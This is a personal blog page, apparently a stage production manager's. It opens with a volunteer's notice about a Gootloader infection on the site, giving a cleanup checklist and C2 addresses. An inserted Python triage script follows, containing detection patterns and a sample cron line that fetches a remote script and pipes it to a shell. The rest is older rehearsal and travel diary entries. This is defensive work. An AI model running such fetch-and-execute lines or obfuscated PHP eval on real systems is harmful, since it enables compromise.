Gootloader infection cleaned up

February 27th, 2022

Dear blog owner and visitors,

This blog had been infected to serve up Gootloader malware to Google search victims, via a common tactic known as SEO (Search Engine Optimization) poisoning. Your blog was serving up 380 malicious pages. Your blog served up malware to 19 visitors.

I tried my best to clean up the infection, but I would do the following:

  • Upgrade WordPress to the latest version (one way the attackers might have gained access to your server)
  • Upgrade all WordPress themes to the latest versions (another way the attackers might have gained access to your server)
  • Upgrade all WordPress plugins (another way the attackers might have gained access to your server), and remove any unnecessary plugins.
  • Verify all users are valid (in case the attackers left a backup account, to get back in)
  • Change all passwords (for WordPress accounts, FTP, SSH, database, etc.) and keys. This is probably how the attackers got in, as they are known to brute force weak passwords.
  • Run antivirus scans on your server
  • Block these IPs (5.8.18.7 and 89.238.176.151), either in your firewall, .htaccess file, or in your /etc/hosts file, as these are the attackers' command-and-control servers, which send malicious commands for your blog to execute.
  • Check cronjobs (both server and WordPress), aka scheduled tasks. This is a common method that an attacker will use to get back in. If you are not sure what this is, Google it.
  • Consider wiping the server completely, as you do not know how deep the infection is. If you decide not to, I recommend installing some security plugins for WordPress, to try and scan for any remaining malicious files. Integrity Checker, WordPress Core Integrity Checker, Sucuri Security, and Wordfence Security all do some level of detection, but not 100% guaranteed.
  • Go through the process for Google to recrawl your site, to remove the malicious links (to see what malicious pages there were, go to Google and search site:your_site.com agreement).
  • Check subdomains, to see if they were infected as well.
  • Check file permissions.

Gootloader (previously Gootkit) malware has been around since 2014, and is used to initially infect a system, and then sell that access off to other attackers, who then usually deploy additional malware, including ransomware and banking trojans. By cleaning up your blog, it will make a dent in how they infect victims. PLEASE try to keep it up-to-date and secure, so this does not happen again.

Sincerely,

The Internet Janitor

Below are some links to research/further explanation on Gootloader:

https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/

https://news.sophos.com/en-us/2021/08/12/gootloaders-mothership-controls-malicious-content/

https://www.richinfante.com/2020/04/12/reverse-engineering-dolly-wordpress-malware

https://blog.sucuri.net/2018/12/clever-seo-spam-injection.html

This message
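The checklist above names three things a practitioner can script rather than eyeball: blocking the two command-and-control addresses, scanning the WordPress tree for leftover injected PHP, and reviewing server cron entries. The script below is an added example written for this page; it is not the Internet Janitor's cleanup code and not anything from the blog. It builds a throwaway WordPress-like directory with constructed sample files (one clean, one recently edited, one carrying an obfuscated `eval`), and the sample crontab is likewise constructed, with a reserved `.invalid` hostname; the detection patterns are generic webshell and cron heuristics, not Gootloader-specific signatures. One caveat the note glosses over: an .htaccess deny only refuses inbound requests from the C2, whereas the injected PHP fetching its commands from the C2 is outbound traffic, so the host firewall rules below cover both directions.

```python
"""Post-cleanup triage helpers for a WordPress install (added example)."""
import os
import re
import tempfile
import time
from pathlib import Path

# The two addresses the cleanup note identifies as C2 servers.
C2_IPS = ["5.8.18.7", "89.238.176.151"]

# Classic PHP dropper/webshell shape: a code-execution call fed by a decoder.
OBFUSCATED_EVAL = re.compile(
    r"\b(eval|assert|create_function)\s*\(\s*"
    r"(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(",
    re.IGNORECASE,
)

# Cron entries that fetch-and-run code, run from scratch dirs, carry base64,
# or execute PHP out of the uploads tree (which should never contain PHP).
SUSPICIOUS_CRON = re.compile(
    r"(curl|wget)\b.*\|\s*(ba)?sh\b|/tmp/|/dev/shm/|wp-content/uploads/.*\.php|base64",
    re.IGNORECASE,
)


def htaccess_deny(ips):
    """Apache 2.4 rules refusing inbound requests from the given IPs only."""
    lines = ["<RequireAll>", "    Require all granted"]
    lines += [f"    Require not ip {ip}" for ip in ips]
    lines.append("</RequireAll>")
    return "\n".join(lines)


def iptables_rules(ips):
    """Host-firewall rules: block the C2 inbound AND outbound (egress matters)."""
    rules = []
    for ip in ips:
        rules.append(f"iptables -A INPUT -s {ip} -j DROP")
        rules.append(f"iptables -A OUTPUT -d {ip} -j DROP")
    return rules


def scan_wordpress(root, days=30, now=None):
    """Return [(relative_path, [reasons])] for PHP files worth a manual look."""
    now = time.time() if now is None else now
    cutoff = now - days * 86400
    findings = []
    for path in Path(root).rglob("*.php"):
        rel = path.relative_to(root).as_posix()
        reasons = []
        if rel.startswith("wp-content/uploads/"):
            reasons.append("php-in-uploads")
        if path.stat().st_mtime >= cutoff:
            reasons.append("recently-modified")
        if OBFUSCATED_EVAL.search(path.read_text(errors="replace")):
            reasons.append("obfuscated-eval")
        if reasons:
            findings.append((rel, reasons))
    return sorted(findings)


def suspicious_cron_lines(crontab_text):
    """Return the non-comment crontab lines matching SUSPICIOUS_CRON."""
    hits = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        if stripped and not stripped.startswith("#") and SUSPICIOUS_CRON.search(stripped):
            hits.append(stripped)
    return hits


# Constructed sample crontab; the hostname is a reserved .invalid name.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://example.invalid/u.sh | sh
@reboot php /var/www/html/wp-content/uploads/2022/02/cache.php
"""


def build_sample_site():
    """Constructed WordPress-like tree: one clean core file backdated by
    400 days, one recently edited theme file, one injected PHP in uploads."""
    root = Path(tempfile.mkdtemp(prefix="wp-"))
    files = {
        "wp-includes/version.php": "<?php $wp_version = '5.9';\n",
        "wp-content/themes/twentytwenty/functions.php":
            "<?php add_action('init', 'twentytwenty_setup');\n",
        "wp-content/uploads/2022/02/cache.php":
            "<?php eval(base64_decode('ZWNobyAnaGknOw=='));\n",
    }
    for rel, body in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    old = time.time() - 400 * 86400
    os.utime(root / "wp-includes/version.php", (old, old))
    return str(root)


def demo():
    """Scan the constructed site and return the findings list."""
    return scan_wordpress(build_sample_site())


if __name__ == "__main__":
    for rel, why in demo():
        print(rel, why)
    print(htaccess_deny(C2_IPS))
    print("\n".join(iptables_rules(C2_IPS)))
    print(suspicious_cron_lines(SAMPLE_CRONTAB))
```

Run it as-is to see the sample findings, or point `scan_wordpress()` at a real document root and `suspicious_cron_lines()` at the output of `crontab -l` (and `/etc/cron.d/*`). Anything flagged is a lead for manual review, not proof of compromise: a legitimate theme update also shows up as "recently-modified", which is why the note's advice to compare against a clean copy (the integrity-checker plugins) still applies.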

Alamo Date

August 5th, 2019

Jane and I worked at home today. And then we went on a date to Alamo Drafthouse. There is a series there that shows older movies. We saw Domino by Tony Scott. Crazy: both a knock-off of Tarantinoesque style and a forerunner of the hyper-American gun movie.

Load-in

August 1st, 2019

Our first try.

We were to load in the flying system from Chicago Flyhouse into NYLA. But the truck didn’t show up. So we sent everyone home and sort of had a long talk with Alice. And went home and got a bit more rest.

Day 18

August 1st, 2019

of 20. Today the artists were in a bit better shape. Alice, upon realizing that we only have two more days left and that they will have to be spent mostly organizing the showing, said “my mind and heart totally want this to keep going but my body could quit right now.”

We only worked until 4pm today, to get a little bit of rest. It might have been better to take that time in the morning, but Alice had to go off to a meeting at 3:30pm.

I got some calls in to the Triptych venues for the fall. And inserted the updates from the team into the rider.

Also I updated my Vectorworks license until September 2021. US$1500+. Did I ever mention that I hate that program?

Over the Wall

July 31st, 2019

For the first day in this three-week process I didn’t show up at the 10am call. I went to Gelsey Kirkland studios to check out the suitability for doing a rehearsal residency for Kinetic Light. The rear studio, no. 1, would be the best. There are several I-beams up there that we could rig from. Power might be a bit of a problem, as the Chicago Flyhouse system requires 3-phase. But probably doable.

I left the house kind of late after speaking with Suzanne at Durham performing arts. Looks like I’m going to be the local production manager for their presentation of ABT’s Giselle next March.

Then the rest of the day I was at rehearsal. Alice and Laurel were pretty trashed. I think that we’ve come up against a wall in the process. There is a good sketch of all the sections that they are going to work on here. But there isn’t much more to do to get the work polished. There just isn’t enough time given that we have to do a showing on Saturday.

We did a fun game of “telephone” where we first passed small phrases from one to another. And then did small dance phrases that we did the same with, transforming them with every passing from person to person.

Wired-Tired

July 30th, 2019

Day 16 straight of rehearsals for Wired. I woke up pretty early. Around 6am. Did some light exercise. I had a last Knäckebrot cracker with some peanut butter. On the way into NYLA I got a Blue Spirulina smoothie. Nice. Also a bottle of green juice for lunch, which I ate with the second half of a wrap from the deli. We got out around 5:30pm. Mark and Janet both made it in. On the way home I was really starving, so I stopped and ate at an old-style NY Chinese place. Orange chicken. Not bad, but it was a lot of meat. Now I’m quite full. The water still tastes a little weird at the house. Almost like there is lemon added to it or something. I threw away our old Brita (it was really banged up) because I thought it was causing the taste. But with the new Brita it’s the same thing. I’m going to go check it straight from the tap.

On the way to L.A.

December 7th, 2015

When I started this thing back in 2007, I don’t think that there was wifi on airplanes. But now it’s free and sponsored by Amazon. I’m sitting all the way in the back. It’s like I’m in the last possible seat. I don’t actually get it. JetBlue sends you a link to check in. I followed the link as soon as I got the email. But there were no seats available. Except for “more room” seats, which I could get for $90. They also charge for a checked bag now. I heard this airline was crap like all the others. Now I believe it.

Traveling to Hong Kong

May 31st, 2010

I’ve departed from Brooklyn to Hong Kong. My intention is to find scene shops in China to build sets for the US and Euro market. I bought a ticket on NW for about $800. I really have to get my frequent flyer thing going because I’ve lost so many flights by ignoring the whole thing over the years. The flight turned out to be a code share with Delta. Jane says that they have merged. We first flew to Tokyo. That was about a 14 hour flight. It’s really a bear to sit still for that amount of time. You can get a full night’s sleep and still have 6 hours to kill. I saw a couple of movies. I tried to watch Ice Age 2 (or whatever number they’re up to) but didn’t last very long. Then I watched a Will Ferrell movie with dinosaurs. It wasn’t good, but it was exactly what you’d expect. Then I watched some movie with a bunch of explosions. I can’t remember what. You can actually feel your internal clock being fucked with as you fly. We took off at about 12 noon and flew in a straight line to Tokyo, which on the globe goes almost to the arctic circle. It starts to get dark around 3pm (home time), then the sun comes back up again at around 9pm. It was dark again by the time we landed, which was 4am(ish) at home and 4pm in Tokyo. In Tokyo I had a fairly short layover. I sat right in front of the gate in case I fell asleep. The flight from Tokyo to HK is about 5 hours. I think I watched another movie on that one, but obviously it was unmemorable. When we landed I had no problem with immigration. I took the MTR train into Hong Kong Central for about US$12 and then a cab to the hotel for about the same. My online reservation was honored without question (whew) and they upgraded me to the business club floor. The room was not non-smoking (the unavailability of non-smoking rooms being the ostensible reason for the upgrade), but it wasn’t too stinky and by the next day it had aired out.
The room was a pretty standard business hotel kind of room, except that it had a very small kitchenette with a deep kitchen sink (with a cutting board kind of cover), two-burner stove, a microwave, hot water boiler and a large refrigerator. All crammed into a not overly large entry hallway. Across the street was a 7-11 open late. I was able to score a couple of beers and some munchies. I sat and checked out the TV and chilled. It took a while for me to get to sleep, and by that time I had drunk quite a bit of beer. The next morning I woke up pretty early. I felt like crap. They are right, one definitely shouldn’t drink in any significant quantity on a super huge flight. It was like a low-grade hangover with fluish symptoms. I have to avoid that in the future. Especially since that night I went to see a performance at CCDC and afterwards went out and drank with Anther. We went to a bar near the CCDC studios. There they brought beer buckets of something called Blue Girl. It was very very light, just like I like beer, but with an alcohol content of 5%. The bottle had a kind of Bavarian theme. There were several waitresses who constantly circulated and kept our glasses from getting empty. We must have drunk about 6 beers each. It was Anther’s birthday, but the people at the bar (who were obviously very close to him) didn’t know it. After the bar made a big to-do about another patron’s birthday, I mentioned to the manager that it was Anther’s birthday as well. After that they moved us to a better table and then all the waitresses came by and sat with us for a while. We played a fun dice game that Anther says is played all over China. There are 5 dice in a cup. You shake the cup, put it upside down on the table, then take a look at your roll.

Facebook update

May 31st, 2010

I wrote on my Facebook page today that I am in Bogota, Colombia “Checkin’ out some theaters”. Well, that’s about as good as I could have imagined for my life at one point. I remember Glen Rumsey (you may know her as Shasta Cola) describing how he knew it was time for him to leave the Merce Cunningham Company. They were performing in L’Opera de Paris Palais Garnier, one of the greatest venues any performer can aspire to play in; he was in his dressing room putting on his make-up and he was miserable, totally miserable. As he sat there, staring at himself, feeling so bad and wondering how this could be at such a pinnacle of success, he knew it was time to move on. Late last night I wrote on my Facebook page that I was in Bogota, Colombia “Checkin’ out some theaters”. I suppose I only did so to impress my friends; why else write anything there? But I guess that I’m not all that impressed with myself in the end. It’s just what I do? Am I miserable? Nope, not like Glen was. I have been like that in the past and I’m nowhere near that yet. But I am at that point where I’ve got to move into new challenges. I want to do things that do impress me. I’ve got to build some sets in China. I’m having some really stupid delays. I decided to find a graphic artist online. I found one whose work I like, but the prepress stuff has really stumped us. I also have taken on a lot of work that needed to get done. Pretty cool work, but work that doesn’t really impress me, even if the money has been better than I’ve usually gotten paid. I need to get this done. I’m sitting here with Maria Rita Stumpf in the lobby of the hotel in Bogota. We visited a theater today. I walked around the stage and pronounced it “OK” with two thumbs up. We’ve been traveling together for three days. We get along well, but we’ve gotten to the point where we haven’t much left to say to each other. We have a 6 hour overnight flight to New York and then I go right into meetings all day.
I guess that’s the best thing, just to keep me going. Then Jane and I are going to see the Donna Uchizono piece.

Tech day in Portland

October 1st, 2009

It was a fairly easy day here in Portland.

Prehang wasn’t finished, so it took much longer to get focusing than it should have. But Leo did have about an hour before lunch. He wasn’t finished by dinner, however, and we started tech at around 8:06.

The crew was fine. Good guys. The house carpenter was with us in the Schnitzer when I was there with Cunningham. He really sorted out our problems and we gave him a bottle of wine on the way out.

Tei had a rough night from food poisoning. None of the rest of us who ate oysters were in trouble, so he figured it was from a Vietnamese sandwich he had for lunch.

We went out to get a cup of coffee and found a great guy running “Cafe Velo”, a bicycle-driven cafe cart. He had two large pots boiling water behind him and a rack of drip set-ups on the cart. You could choose your coffee and he would drip it fresh. Mine was goooood.

The Cafe Velo was in the green market that appears downtown. Leo and I had lunch there. We both had tamales. Not bad but not spectacular. Only $5.

Hilary stopped by in the afternoon and I showed her around the theater, everything from spike marks to the fly system to how the lighting computer works.

We went to dinner at Indonesian Place. I had fried rice.

Rehearsal went very well. But we kind of fucked up the spacing for “Place” and Ana was quite upset, but she usually is.

Hilary came and watched the rehearsal as well. I think she had a good time.

I walked around Portland and tried to find a bar. I was able to get a beer at a place called Lotus. But they closed at midnight. So I bought some beers at a deli and came home. They had a publication called “Busted”, a round-up of police blotter info from around the area. Something I’m sure no one wants: that kind of press.